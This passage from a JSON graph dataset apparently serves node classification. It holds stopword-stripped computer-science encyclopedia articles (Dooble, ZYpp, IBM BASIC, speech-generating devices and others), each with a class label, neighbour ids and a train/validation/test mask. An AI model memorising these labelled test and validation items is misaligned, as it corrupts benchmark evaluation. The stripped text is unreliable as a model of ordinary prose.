    "text": "Dooble:dooble dooble free open-source web browser created improve privacy currently dooble available freebsd linux os x os/2 windows dooble uses qt user interface abstraction operating system processor architecture result dooble portable system supports openssl posix threads qt sqlite libraries dooble designed implemented order improve privacy usability dooble includes simple bookmarking system users may modify bookmarks via bookmarks browser popup accessible location widget along standard cookie management options dooble also provides mechanism automatically removes cookies permitted dooble occasionally remove undesired http cookies dooble web browser provides according news portal hongkiat easy use download manager dooble partially integrates distributed search engine yacy data dooble retains stored using authenticated encryption dooble encode file associations user settings dooble also provides session-based model using temporary keys passphrase may modified without loss data included non-javascript file manager ftp browser version 1.53 introduced gopher protocol support security passphrase created browser password set safe area browser settings need create master password otherwise everything wiped exit program points pcadvisor version 1.26 dooble introduced support addons torbrowser add-on based vidalia added version 1.40 vidalia plugin removed version 1.49 add-on name interface expands browser social network functions like messenger group chat friend list e-mail client chess game forum function like bulletin board interface based qt integrated plugin based clone retroshare messenger plugin considered deprecated configurable proxy settings provide reasonable flexibility dooble supports session restoration authenticated sessions dooble exits prematurely user may restore previous tabs windows next authenticated session web sites employ iframes order distribute content one third-party web sites since technology may raise privacy issues users dooble provides means blocking external content first version 0.1 released september 2008 current version 2.1.6 released january 25 2018 dooble also available nokia n900 dooble rated ninth ten top linux browsers jack wallen dooble announced one top five best *secure* browsers pcworld reviews dooble feature side rendering quickly even image-heavy sites. guardian newspaper recommends dooble alternative browser surveillance try privacy-focused browser dooble. add-on links",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4725,
      3191,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      3300,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      8557,
      3961,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      5546,
      944,
      5054,
      10174,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      7656,
      8169,
      5612,
      494,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1521,
    "label": 3,
    "text": "Business_process_interoperability:business process interoperability business process interoperability bpi property referring ability diverse business processes work together called inter-operate state exists business process meet specific objective automatically utilizing essential human labor typically bpi present process conforms standards enable achieve objective regardless ownership location make version design computer systems used main attraction bpi business process start finish point worldwide regardless types hardware software required automate capacity offload human mind labor bpi considered many final stage evolution business computing bpi twin criteria specific objective essential human labor subjective objectives bpi vary tend fall following categories business process interoperability limited enterprise software systems functions designed work together payroll module general ledger module part program suite controlled software environments use edi interoperability also present incompatible systems middleware applied cases however processes seldom meet test bpi constrained information silos systems inability freely communicate among term business process interoperability bpi coined late 1990s mostly connection value chain electronic commerce bpi utilized promotional materials various companies appears subject research organizations concerned computer science ontologies despite attention received business process interoperability applied outside limited information system environments possible reason bpi requires universal conformance standards business process start finish point worldwide standards fairly straightforward—organizations use finite set shared processes manage operations bringing enterprises together create adopt standards another matter entirely world management systems characterized information silos moving away silos requires organizations deal cultural issues ownership sharing processes data competitive forces security mention effect automation work forces timetable adoption bpi predicted remains subject interest organizations think tanks alike test bpi organization analyzes business process determine meet specific objective utilizing essential human labor specific objective must clearly defined start finish start finish highly subjective however one organization process may start customer orders product finish product delivered customer another organization process may preceded product manufacture distribution may followed management after-sale warranty repairs essential human labor includes qualify bpi every process task must taken account start finish including labor falls cracks created incompatible software applications gathering data one system re-inputting another preparing reports include data disparate systems process must flow uninterrupted regardless underlying computerized systems used non-essential human labor exists point process fails test bpi assure business processes meet specific objectives automatically utilizing essential human labor bpi takes “ service-oriented architecture “ soa approach focuses processes rather technologies required automate widely used soa effective way address problems caused disparate system heart information silo soa makes practical sense organizations expected replace modify current enterprise software achieve bpi regardless benefits involved many workers jobs built around applications use organizations sizable investments current information infrastructures complex even smallest modification costly time-consuming disruptive even software makers unite conform products single set standards problem would solved besides software well-known manufacturers organizations use great many legacy software systems custom applications manual procedures paper forms without soa streamlining huge number disparate internal processes interoperate across entire global enterprise spectrum simply question create soa widespread use bpi relies centralized database repository containing shared data procedures common applications every industry geographical area essence repository serves top application layer enabling organizations export data distributed database obtain programs need simply logging via portal assure security commercial neutrality repository conforms standards promulgated community bpi stakeholders organizations interest groups wish achieve business process interoperability begin establishing one bpi initiatives",
    "neighbors": [
      4107,
      8122,
      467,
      2948
    ],
    "mask": "None"
  },
  {
    "node_id": 1522,
    "label": 2,
    "text": "ZYpp:zypp zypp libzypp package manager engine powers linux applications like yast zypper implementation packagekit opensuse suse linux enterprise unlike basic package managers provides satisfiability solver compute package dependencies free open-source software project sponsored novell licensed terms gnu general public license v2 later zypp implemented mostly programming language c++ zypper native command-line interface zypp package manager install remove update query software packages local remote networked media graphical equivalent yast package manager module used opensuse since version 10.2 beta1 opensuse 11.1 zypper reached version 1.0 june 2 2009 ark linux announced completed review dependency solvers chosen zypp tools replace aging apt-rpm first distribution zypper also part mobile linux distributions meego sailfish os tizen following consecutive acquisitions ximian suse gmbh 2003 novell decided merge package management systems yast package manager red carpet best breed approach two solutions far used novell looking extant open source tools maturity available back 2005 none fulfilled requirements able work smoothly extant linux management infrastructure software developed ximian suse decided get best ideas extant pieces work new implementation libzypp resulting library planned software management engine suse distributions linux management component novell zenworks management suite libzypp solver port red carpet solver written update packages installed systems using full installing process brought limits adding extensions support weak dependencies patches made fragile unpredictable although first version zypp solver worked satisfactorily company enterprise products coupled zmd daemon led opensuse 10.1 release came may 2006 system package working expected december 2006 opensuse 10.2 release corrected defects prior release using revisited zypp v2 zmd subsequently removed 10.3 release reserved company enterprise products zypp v3 provided opensuse relatively good package manager equivalent existing package managers suffered flaws implementation greatly limited speed performance area libzypp needed improvement speed dependency solver libsolv written released revised bsd license projects like optimal package install/uninstall manager opium mancoosi trying fix dependency solving issues sat solver traditional solvers like advanced packaging tool apt sometimes show unacceptable deficiencies decided integrate sat algorithms zypp stack solver algorithms used based popular minisat solver sat solver implementation appears opensuse 11.0 based two major independent blocks several months work benchmark results fourth zypp version integrated sat solver encouraging moving yast zypper ahead rpm-based package managers speed size",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      11513,
      9671,
      5067,
      3918,
      463,
      3791,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      5860,
      741,
      7140,
      231,
      5096,
      6119,
      9063,
      9324,
      9197,
      7920,
      2417,
      1138,
      6257,
      10096,
      6393,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 1523,
    "label": 9,
    "text": "Supercombinator:supercombinator supercombinator mathematical expression fully bound self-contained may either constant combinator subexpressions supercombinators supercombinators used implementation functional languages mathematical terms lambda expression supercombinator arity n free variables form λx.λx ... λx e n ≥ 0 lambdas required e lambda abstraction lambda abstraction e supercombinator",
    "neighbors": [
      1124,
      727
    ],
    "mask": "Test"
  },
  {
    "node_id": 1524,
    "label": 2,
    "text": "Qt_Extended:qt extended qt extended named qtopia september 30 2008 application platform embedded linux-based mobile computing devices personal digital assistants video projectors mobile phones developed qt software subsidiary nokia cancelled qt extended project free software community created fork qt extended improved project continued building qtmoko debian-based distribution natural successor projects continued efforts openmoko community qt extended features qt extended dual licensed gnu general public license gpl proprietary licenses 2006 qtopia running several million devices including 11 mobile phone models 30 handheld devices models included sharp corporation zaurus line linux handhelds sony mylo archos portable media assistant pma430 multimedia device gamepark holdings gp2x greenphone open phone initiative pocket pc fic openmoko phones neo 1973 freerunner unofficial hack allows use archos wifi series portable media players pmp 604 605 705 also several motorola phones e2 z6 a1200 u980 zte last phone running native applications could developed compiled using c++ managed applications could developed java march 3 2009 qt software announced discontinuation qt extended standalone product features integrated qt framework openmoko community forked final stable release qt extended improved later renamed qtmoko like predecessor application platform embedded linux-based mobile computing devices personal digital assistants video projectors mobile phones dual licensed gnu general public license gpl proprietary licenses qt extended improved run several mobile devices notably openmoko phones neo 1973 freerunner",
    "neighbors": [
      4225,
      7938,
      2179,
      7812,
      5637,
      6,
      8326,
      4360,
      9732,
      11271,
      4364,
      4493,
      9356,
      2195,
      10259,
      1813,
      11155,
      7579,
      10780,
      6301,
      1694,
      4383,
      3618,
      3626,
      4011,
      5677,
      9646,
      7727,
      3248,
      7857,
      823,
      1083,
      7483,
      9660,
      5824,
      10817,
      1602,
      7492,
      5067,
      7246,
      4305,
      2259,
      8147,
      7253,
      3542,
      3162,
      4957,
      607,
      10080,
      1761,
      8423,
      10215,
      4841,
      10599,
      6763,
      2925,
      495,
      5363,
      5875,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 1525,
    "label": 4,
    "text": "BlueHat:bluehat bluehat blue hat blue-hat term used refer outside computer security consulting firms employed bug test system prior launch looking exploits closed particular microsoft uses term refer computer security professionals invited find vulnerability products windows blue hat microsoft hacker conference invitation-only conference created window snyder intended open communication microsoft engineers hackers event led mutual understanding well occasional confrontation microsoft developers visibly uncomfortable metasploit demonstrated",
    "neighbors": [
      1540,
      1573,
      8135,
      3473,
      7605,
      7449,
      4956,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1526,
    "label": 4,
    "text": "Domain-validated_certificate:domain-validated certificate domain validated certificate dv x.509 digital certificate typically used transport layer security tls domain name applicant validated proving control dns domain sole criterion domain validated certificate proof control whois records dns records file email web hosting account domain typically control domain determined using one following domain validated certificate distinct extended validation certificate requirement issuing certificate particular domain validated certificates assure particular legal entity connected certificate even domain name may imply particular legal entity controls domain web browsers may show lock often grey rather green lock typically used extended validation certificate dns domain name legal entity never displayed domain validated certificates include legal entity subject low assurance requirements allow domain validated certificates issued quickly without requiring human intervention domain validated certificates number unique characteristics",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      8204,
      9744,
      1683,
      1688,
      3742,
      2083,
      8358,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      2003,
      5078,
      5590,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      4326,
      5107,
      501,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 1527,
    "label": 3,
    "text": "Jet_Set_Willy:jet set willy jet set willy platform video game originally written matthew smith zx spectrum home computer published 1984 software projects ported home computers time game sequel manic miner published 1983 second game miner willy series significant development platform game genre home computer tired miner willy tidy items left around house huge party done housekeeper maria let go bed willy mansion bought wealth obtained adventures manic miner much remains unexplored appears full strange creatures possibly result previous missing owner experiments willy must explore enormous mansion grounds including beach yacht fully tidy house get much-needed sleep jet set willy flip-screen platform game player moves protagonist willy room room mansion collecting objects unlike screen-by-screen style prequel player explore mansion willy controlled using left right jump climb stairs walking jumping avoid climb swinging ropes pushing left right depending direction rope swinging play area consists 60 playable screens making mansion grounds contains hazards static killer objects guardians killer monsters move along predetermined paths various platforms collectable objects collectable items glow distinguish objects room willy loses life touches hazard guardian falls far returned point entered room may lead game-ending situation willy repeatedly falls height unavoidably collides guardian losing lives succession one bizarrely named rooms game must perform quirkafleeg pre-release name screen gaping pit reference comic strip fat freddy cat spin-off fabulous furry freak brothers original comic quirkafleeg obscure ritual foreign country required performed upon sight dead furry animals music spectrum version beethoven moonlight sonata menu rich man game early release versions played grieg hall mountain king in-game music music c64 version beethoven moonlight sonata loading j.s bach inventions 1 gameplay upon release game could completed due several bugs although four completely unrelated issues became known collectively attic bug entering attic screen various rooms would undergo corruption subsequent playthroughs including monsters disappearing chapel level screens triggering game caused error path arrow attic resulting sprite traveling past end spectrum video memory overwriting crucial game data instead initially software projects attempted pass bug intentional feature make game difficult claiming rooms question filled poison gas however later rescinded claim issued set pokes correct flaws despite bugs ross holman cameron else competition software projects set completion jet set willy provided software projects set bug fixes software projects hired cameron else port manic miner jet set willy msx reviewing jet set willy spectrum magazine june 1984 sue denham wrote game every bit good refreshing original game number one uk spectrum sales chart several months replaced sabre wulf final issue sinclair zx spectrum version ranked number 32 sinclair official top 100 games time voted number 33 sinclair readers top 100 games time 2004 zx spectrum version voted 6th best game time retro gamer readers article originally intended special issue sinclair bundled retro gamer game included 1985 compilation sold million along beach-head daley thompson decathlon sabre wulf jet set willy came form copy protection card 180 coloured codes bundled cassette upon loading one codes card entered game would start although cassette could duplicated copy card also needed time home colour reproduction difficult making jet set willy harder copy spectrum games however means circumventing card quickly found one method published uk computer magazine original releases jet set willy bbc micro commodore 64 also contained bugs made impossible complete game—though different bugs spectrum version commodore 64 version impossible reach items wine cellar two versions original jet set willy msx software projects version sold uk dated 1984 programmed cameron else co-winner jet set willy competition version published hudson soft 1985 bee card japan port jet set willy atari 8-bit family computers released tynesoft 1986 received generally poor reviews criticised inferior graphics animation however rob hubbard theme music unique version considered highlight like spectrum version impossible complete different reasons legitimate items needed caused player lose life e.g bottles licence ports software projects amiga atari st cancelled release jet set willy final frontier expanded version amstrad cpc later converted back zx spectrum released jet set willy ii original game jet set willy ii released bbc micro acorn electron msx commodore 16 commodore 64 differently expanded version jet set willy released dragon 32/64 extra rooms version could also completed impossible traverse drive right-to-left direction necessary return bed collecting items game could however completed using built-in cheat accessed holding keys x simultaneously allowing start willy position screen using arrow keys spacebar dragon port converted run acorn archimedes computers better collision detection meant drive could completed right-to-left unlike dragon original spectrum version rooms stored straightforward format compression making relatively easy create customised versions game review jsw issue 4 spectrum included section entitled jsw — hacker guide remarks section imply author successfully deduced least data structures since able remove sections wall master bedroom following year issue 13 contained program added extra room april showers game issue 15 described data formats detail several third-party editing tools published 1984 1986 allowing players design rooms sprites following platform games mould miner willy series purpose game collect objects complete scenes game",
    "neighbors": [
      1220,
      7719,
      9322,
      4109,
      4973,
      9006,
      10862,
      10931,
      599,
      9310,
      8415
    ],
    "mask": "None"
  },
  {
    "node_id": 1528,
    "label": 4,
    "text": "Jason_Healey:jason healey jason healey senior research scholar faculty international public affairs adjunct professor international public affairs school international public affairs columbia university also senior fellow cyber statecraft initiative atlantic council program founding director published several academic articles essays books topic cyber security advised security measures corporate government military institutions identified first historian cyber conflict healy born raised rhode island 17 joined united states air force initially training fighter pilot healey transitioned signals intelligence 1998 began working pentagon implement computer network defense system air force career jason awarded two meritorious service medals based contributions cyber security service pentagon healey later received master degree information security james madison university healey worked numerous settings regard cyber policy implementation addressing responses security threats hong kong served vice president goldman sachs developed crisis-response system built address incidents across asian continent also worked white house director cyber infrastructure protection currently board member cyber conflict studies association military cyber professionals association extent work led one magazine refer healey first historian cyber conflict frequently healey publicly commented written articles high-profile malware threats cyber policy instance healey discussed potential advantages disadvantages united states launching cyber-based attacks regards offensive syria stated longer drop physical bombs kill people targeted non-lethal microforce surmised due past leaks united states involvement stuxnet relevant government agencies may decided healey also commented heartbleed bug noting failure nsa live stated priority defense exposing bug found said organization would shredded computer security community failure 2013 healey also took critical stance current state mass surveillance united states predicted u.s. interests abroad would suffer deep long term damage given administration could implement alternatives spying conducted national security agency 2012 healey published fierce domain cyber conflict 1986 2012 explores idea confrontations taken place within cyberspace established new kind conflict development explored historically starting 1986 hacking initiative planned kgb steal military plans u.s. referred cuckoo egg case book received positive reception referred definitive historical record cyber conflict march 2014 forbes magazine identified healey one twenty cyber policy experts follow twitter",
    "neighbors": [
      3843,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 1529,
    "label": 4,
    "text": "ISheriff:isheriff isheriff formerly internet sheriff internet security software vendor specializes cloud-based security compliance specialties e-mail filtering web filters endpoint security company privately held based redwood city california founded brisbane australia 1999 isheriff products focused content filtering email web filtering software appliances 2009 company moved products cloud computing service model isheriff services include e-mail filtering web filtering email archiving e-mail encryption security reporting company holds patent data modeling engine based bayesian spam filtering principals 2006 isheriff provided internet filtering software tasmanian government first statewide trial anti-pornography filters children july 2012 total defense inc. provider cybercrime-fighting technology announced acquired isheriff april 21 2014 total defense announced conjunction sale consumer business unit untangle re-branded isheriff isheriff founded oscar marquez ceo /cto email security archiving – cloud-based anti-spam email security email archiving removing incoming email spam providing clean email connection secures viruses unwanted content data leakage well cloud-based archiving web security cloud-based content malware filtering providing secure internet browsing enforcement acceptable use policies data leak protection endpoint security cloud-based platform multi-layer anti-malware approach protects malware secures controls applications used end users protects threats removable media isheriff sells products partners distributors",
    "neighbors": [
      4194,
      11046,
      8747,
      4945,
      569,
      7515,
      9053
    ],
    "mask": "None"
  },
  {
    "node_id": 1530,
    "label": 3,
    "text": "Hatari_(emulator):hatari emulator hatari open-source emulator atari st 16/32-bit computer system family emulates atari st atari ste atari tt atari falcon computer series corresponding peripheral hardware like joysticks mouse midi printer serial floppy hard disks supports graphics modes st require original tos image supports emutos latest version reported issues st/ste/tt applications emulation compatibility also st/ste games demos work without issues hatari uses source code several emulators winston atari st peripherals uae motorola 680x0 cpu winuae accurate motorola 68030 cpu mmu stonx blitter aranym motorola 56001 dsp videl nvram hatari uses sdl library graphics developed linux ported many oses amigaos 4 aros bsd beos risc os morphos macos amigaos windows",
    "neighbors": [
      7299,
      6797,
      7983,
      5264,
      3793,
      10480,
      6100,
      5397,
      823,
      6104,
      8761,
      2045,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 1531,
    "label": 2,
    "text": "Auxiliary_storage_pool:auxiliary storage pool ibm operating system disk drives may grouped auxiliary storage pool asp order organize data limit impact storage-device failures reduce recovery time disk failure occurs data pool containing failed unit needs recovered asps may also used improve performance isolating objects similar performance characteristics example journal receivers pool default disk drives assigned pool 1 additional pools created rarely done anymore concept ibm pools similar unix/linux concept volume groups however ibm typical disk drives assigned single asp",
    "neighbors": [
      1801,
      3323,
      5492,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1532,
    "label": 4,
    "text": "Howard_Barlow:howard barlow howard c. barlow 1918 – 2003 american cryptographer telecommunications expert high-ranking civilian employee national security agency nsa united states barlow graduate carnegie institute technology b.s electrical engineering served european theatre world war ii one major assignments communications planning officer invasion normandy 1944 overseas designed various types specialized communications equipment war barlow stayed cryptologic profession joined civilian armed forces security agency later became nsa worked research development division one first communications security comsec engineers 1954 risen level division chief 1955-1956 barlow attended harvard university middle management program graduating master degree business administration returning nsa took tour operations named deputy director research development 1958 held position 1962 made assistant director comsec adc position held 1973 insights management skills created world-class analytic engineering organization able meet communications needs vietnam war cold war political skills enabled nsa forge significant comsec relationships u.s allies become leader comsec nato long illustrious career howard barlow received many awards including nsa exceptional civilian service award 1967 1973 department defense distinguished civilian service award highest award granted civilian dod barlow died 2003",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 1533,
    "label": 2,
    "text": "Nokia_N70:nokia n70 nokia n70 3g smartphone nokia created jake henderson announced part nokia new line multimedia smartphones nseries april 27 2005 started shipping september 2005 runs s60 2nd edition feature pack 3 symbian v8.1 operating system succeeded nokia n73 n70 popular sold well nokia n70 model n70-1 one handsets nokia nseries lineup smart phones equipped 2-megapixel camera built-in flash front vga camera allow video calling fm radio bluetooth digital music player functionality support 3d symbian java games s60 2nd edition software time launch n70 built-in memory alongside system memory penultimate related n72 symbian os 8.x device released nokia since introduction new os9 platform released 2003 offers flexibility original made 1998 upgraded 2006 nokia released n70 music edition phone n70-5 variant n70 without 3g front camera shipped china mexico east europe markets provides lower-cost option users want need 3g services 2006 nokia released music edition series n70 n73 n91 black housing new sales boxes packages special extra storage capacity compared standard models music edition n70-1 model featured 1 gb memory card 3.5 mm audio adapter remote control ad-41 headphones hs-28 dedicated music button place multimedia key button music edition also features new themes colored green red speakers music interface phone improved http //www.sistemyolu.org/forum/nokia-eseries-s60-3-2-phones-nokia-e55-and-nokia-e75-f96.html",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      5677,
      7983,
      690,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      11469,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1377,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      9964,
      109,
      5998,
      1776,
      8433
    ],
    "mask": "None"
  },
  {
    "node_id": 1534,
    "label": 3,
    "text": "PowerBook_180:powerbook 180 powerbook 180 portable computer released apple computer inc. along powerbook 160 october 1992 time constituted new top-of-the-range model replacing previous powerbook 170 case design features 170 shipped powerful 33 mhz motorola 68030 cpu motorola 68882 fpu along 160 introduced new power saving feature allowed processor run slower 16 mhz rate speed original 140 powerbook 180 came diagonal active matrix lcd screen capable displaying 4-bit grayscale trackball mounted beneath keyboard 1.44 mb floppy disk drive 80 mb 2.5-inch hard drive also standard apple powerbook also gave option possible expansion 120 mb hard drive equipped keyboard stands slant keyboard like macintosh portable addition external color video port missing 170 180 became full-featured no-compromises desktop replacement equivalent performance macintosh lc iii+ sold may 1994 june 1993 apple released identical color version model powerbook 180c pictured diagonal active matrix color lcd capable displaying 256 colors first powerbook natively display 640x480 previous powerbooks 640x400 resolution result thicker color display exterior case lid redesigned closely resembling used powerbook duo series modification used powerbook 165c accommodate thicker color display well",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1535,
    "label": 9,
    "text": "IBM_BASIC:ibm basic ibm personal computer basic commonly shortened ibm basic programming language first released ibm ibm personal computer model 5150 ibm pc 1981 ibm released four different versions microsoft basic interpreter licensed microsoft pc pcjr known cassette basic disk basic advanced basic basica cartridge basic versions disk basic advanced basic included ibm pc dos pc dos 4 addition features ansi standard basic ibm versions offered support graphics sound hardware ibm pc line source code could typed full-screen editor limited facilities provided rudimentary program debugging ibm also released version microsoft basic compiler pc concurrently release pc dos 1.10 1982 ibm licensed microsoft basic ibm personal computer despite already version basic company mainframes estridge said microsoft basic hundreds thousands users around world going argue ibm cassette basic came 32 kilobytes kb read-only memory rom separate 8 kb bios rom original ibm pc require operating system run cassette basic provided default user interface invoked bios int 18h floppy disk drive installed boot code find bootable floppy disk power name cassette basic came use cassette tapes rather floppy disks store programs data cassette basic built roms original pc xt early models ps/2 line supported loading saving programs ibm cassette tape interface unavailable models original model 5150 entry-level version 5150 came 16 kb random-access memory ram sufficient run cassette basic however cassette basic rarely used pcs sold without disk drive sold pc dos sufficient ram least run disk basic—many could run advanced basic well three versions cassette basic c1.00 found early ibm pcs 16k-64k motherboards c1.10 found later ibm pcs xts ats ps/2s c1.20 found pcjr ibm disk basic basic.com included original ibm pc dos uses 32 kb cassette basic rom basic.com run even highly compatible pc clones compaq portable name disk basic came use floppy disks well cassette tapes store programs data disk-based code corrected errata rom-resident code added floppy disk serial port support disk basic could identified use letter preceding version number added disk support features lacking cassette basic include extended sound/graphics functions basica primary purpose disk basic light version ibm pcs 48 kb memory basic.com would 23 kb free user code whereas basica would 17 kb 1986 new pcs shipped least 256k dos versions 3.00 reduced disk basic small stub called basica.com compatibility batch files even excess ram basic would still allocate manage 61 kb user programs whether cassette basic basic.com basica ibm advanced basic basica.com also included original ibm pc dos required rom-resident code cassette basic added functions diskette file access storing programs disk monophonic sound using pc built-in speaker graphics functions set clear pixels draw lines circles set colors event handling communications joystick presses basica would run non-ibm computers even so-called 100 compatible machines later ibm models since lack needed rom basic basica versions respective dos beginning v1.00 ending v3.30 early versions basica support subdirectories graphics commands functioned slightly differently example line statement used draw lines trailed off-screen basic would merely intersect nearest adjacent line basic 2.x went screen intersect paint command basic 1.x begins filling coordinate specified expands outward alternating directions basic 2.x fills everything starting coordinate finishing everything basic 1.x paint command also makes use system stack storage filling complex areas possible produce overflow error remedy clear statement used expand basic stack 128 bytes default size basic 2.x use stack painting thus free problem compaq basic 1.13 first standalone basic pc require cassette basic run well version basic besides ibm basica 1.00 1.10 use fcbs include original line statement intersecting lines paint statement compaq basic 1.13 worked like later versions basica/gw-basic using new fill algorithm stack early versions pc dos included several sample basic programs demonstrating capabilities pc including basica game donkey.bas gw-basic identical basica exception including cassette basic code program thus allowing run non-ibm computers later ibm models lack cassette basic rom rom cartridge version basic available ibm pcjr shipped 1984 supported additional graphics modes sound capabilities possible machine superset advanced basic cartridge basic operate within first 128 kb memory pcjr work expansion ram i.e def seg function used point memory segments h1ff0 cartridge basic activated typing basica dos prompt conversely ibm basica versions 2.1 refuse run detects pcjr patched work around cassette basic loads pc pcjr booted without bootable disk cartridge disk basic advanced basic load command name basic basica respectively typed dos command prompt except pcjr activates cartridge basic instead optional parameters control allocation memory loaded sign-on identification message displays program version number full-screen text editor starts see images right function keys assigned common commands display bottom screen commands may typed load save programs expressions typed executed direct immediate mode line input starts number language system stores following line text part program source allowing programmer enter entire program line line entering line numbers statement listed screen lines displayed order increasing line number changes made displayed line program source code moving cursor line cursor keys typing on-screen text program source stored internally tokenized form reserved words replaced single byte token save space execution time programs may saved compact tokenized form optionally saved dos ascii text files viewed edited programs like dos applications ibm basic text-mode program features windows icons mouse support cut-and-paste editing gw-basic launched 1983 disk-based microsoft product distributed non-ibm ms-dos computers supports graphics modes features basica computers ibm cassette basic successor basica ms-dos pc dos versions discontinued qbasic launched 1991 stripped-down version microsoft quickbasic compiler qbasic interpreter compile source files quickbasic compile save programs .exe executable file format",
    "neighbors": [
      11008,
      5635,
      6148,
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      2874,
      315,
      7355,
      7486,
      7870,
      4160,
      5312,
      4674,
      4548,
      8262,
      10750,
      712,
      9166,
      847,
      2383,
      3323,
      6102,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      1515,
      11243,
      2541,
      8301,
      7151,
      8429,
      6129,
      9714,
      5747,
      759,
      6778,
      2811,
      6910
    ],
    "mask": "Test"
  },
  {
    "node_id": 1536,
    "label": 0,
    "text": "Speech-generating_device:speech-generating device speech-generating devices sgds also known voice output communication aids electronic augmentative alternative communication aac systems used supplement replace speech writing individuals severe speech impairments enabling verbally communicate sgds important people limited means interacting verbally allow individuals become active participants communication interactions particularly helpful patients suffering amyotrophic lateral sclerosis als recently used children predicted speech deficiencies several input display methods users varying abilities make use sgds sgds multiple pages symbols accommodate large number utterances thus portion symbols available visible one time communicator navigating various pages speech-generating devices produce electronic voice output using digitized recordings natural speech speech synthesis—which may carry less emotional information permit user speak novel messages content organization updating vocabulary sgd influenced number factors user needs contexts device used development techniques improve available vocabulary rate speech production active research area vocabulary items high interest user frequently applicable range meanings pragmatic functionality multiple methods accessing messages devices directly indirectly using specialized access devices—although specific access method depend skills abilities user sgd output typically much slower speech although rate enhancement strategies increase user rate output resulting enhanced efficiency communication first known sgd prototyped mid-1970s rapid progress hardware software development meant sgd capabilities integrated devices like smartphones notable users sgds include stephen hawking roger ebert tony proudfoot pete frates founder als ice bucket challenge speech-generating systems may dedicated devices developed solely aac non-dedicated devices computers running additional software allow function aac devices sgds roots early electronic communication aids first aid sip-and-puff typewriter controller named patient-operated selector mechanism possum prototyped reg maling united kingdom 1960 possum scanned set symbols illuminated display researchers delft university netherlands created lightspot operated typewriter lot 1970 made use small movements head point small spot light matrix characters equipped photoelectric cell although commercially unsuccessful lot well received users 1966 barry romich freshman engineering student case western reserve university ed prentke engineer highland view hospital cleveland ohio formed partnership creating prentke romich company 1969 company produced first communication device typing system based discarded teletype machine 1970s early 1980s several companies began emerge since become prominent manufacturers sgds toby churchill founded toby churchill ltd 1973 losing speech following encephalitis us dynavox known sentient systems technology grew student project carnegie-mellon university created 1982 help young woman cerebral palsy communicate beginning 1980s improvements technology led greatly increased number variety performance commercially available communication devices reduction size price alternative methods access target scanning also known eye pointing calibrate movement user eyes direct sgd produce desired speech phase scanning alternatives presented user sequentially became available communication devices speech output possibilities included digitized synthesized speech rapid progress hardware software development continued including projects funded european community first commercially available dynamic screen speech generating devices developed 1990s software programs developed allowed computer-based production communication boards high-tech devices continued become smaller lighter increasing accessibility capability communication devices accessed using eye-tracking systems perform computer word-processing internet use environmental control device independent access equipment tv radio telephones stephen hawking came associated unique voice particular synthesis equipment hawking unable speak due combination severe disabilities caused als emergency tracheotomy past 20 years sgd gained popularity amongst young children speech deficiencies autism syndrome predicted brain damage due surgery starting early 2000s 